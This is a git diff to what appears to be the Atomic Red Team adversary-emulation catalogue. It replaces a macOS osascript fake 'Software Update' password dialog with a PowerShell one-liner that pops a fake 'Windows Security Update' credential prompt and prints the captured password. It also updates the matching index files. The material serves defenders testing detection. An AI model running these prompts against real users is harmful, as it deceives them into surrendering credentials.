diff --git a/atomics/T1141/T1141.md b/atomics/T1141/T1141.md
index 75e74aac..f41e42f3 100644
--- a/atomics/T1141/T1141.md
+++ b/atomics/T1141/T1141.md
@@ -9,20 +9,21 @@ Adversaries can prompt a user for a number of reasons that mimic normal usage, s
## Atomic Tests
-- [Atomic Test #1 - Prompt User for Password](#atomic-test-1---prompt-user-for-password)
+- [Atomic Test #1 - PowerShell - Prompt User for Password](#atomic-test-1---powershell---prompt-user-for-password)
-## Atomic Test #1 - Prompt User for Password
-Prompt User for Password (Local Phishing)
-Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
+## Atomic Test #1 - PowerShell - Prompt User for Password
+Prompt User for Password (Local Phishing) as seen in Stitch RAT.
-**Supported Platforms:** macOS
+Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
+
+**Supported Platforms:** Windows
-#### Run it with `sh`!
+#### Run it with `command_prompt`!
```
-osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
+powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo $cred.GetNetworkCredential().Password;}
```
diff --git a/atomics/index.md b/atomics/index.md
index 2eae2260..e4b39943 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -513,7 +513,7 @@
- [T1056 Input Capture](./T1056/T1056.md)
- Atomic Test #1: Input Capture [windows]
- [T1141 Input Prompt](./T1141/T1141.md)
- - Atomic Test #1: Prompt User for Password [macos]
+ - Atomic Test #1: PowerShell - Prompt User for Password [windows]
- T1208 Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1142 Keychain](./T1142/T1142.md)
- Atomic Test #1: Keychain [macos]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 4786277a..c7fcfac1 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -14393,21 +14393,18 @@ credential-access:
created: '2017-12-14T16:46:06.044Z'
identifier: T1141
atomic_tests:
- - name: Prompt User for Password
+ - name: PowerShell - Prompt User for Password
description: |
- Prompt User for Password (Local Phishing)
- Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
- supported_platforms:
- - macos
- executor:
- name: sh
- command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell
- app "System Preferences" to activate'' -e ''tell app "System Preferences"
- to display dialog "Software Update requires that you type your password
- to apply changes." & return & return default answer "" with icon 1 with
- hidden answer with title "Software Update"''
+ Prompt User for Password (Local Phishing) as seen in Stitch RAT.
-'
+ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ command: powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows
+ Security Update', '',[Environment]::UserName, [Environment]::UserDomainName);
+ echo $cred.GetNetworkCredential().Password;}
T1142:
technique:
id: attack-pattern--9e09ddb2-1746-4448-9cad-7f8b41777d6d
diff --git a/atomics/macos-index.md b/atomics/macos-index.md
index e475c390..c921ae55 100644
--- a/atomics/macos-index.md
+++ b/atomics/macos-index.md
@@ -186,7 +186,6 @@
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056 Input Capture](./T1056/T1056.md)
- [T1141 Input Prompt](./T1141/T1141.md)
- - Atomic Test #1: Prompt User for Password [macos]
- [T1142 Keychain](./T1142/T1142.md)
- Atomic Test #1: Keychain [macos]
- [T1040 Network Sniffing](./T1040/T1040.md)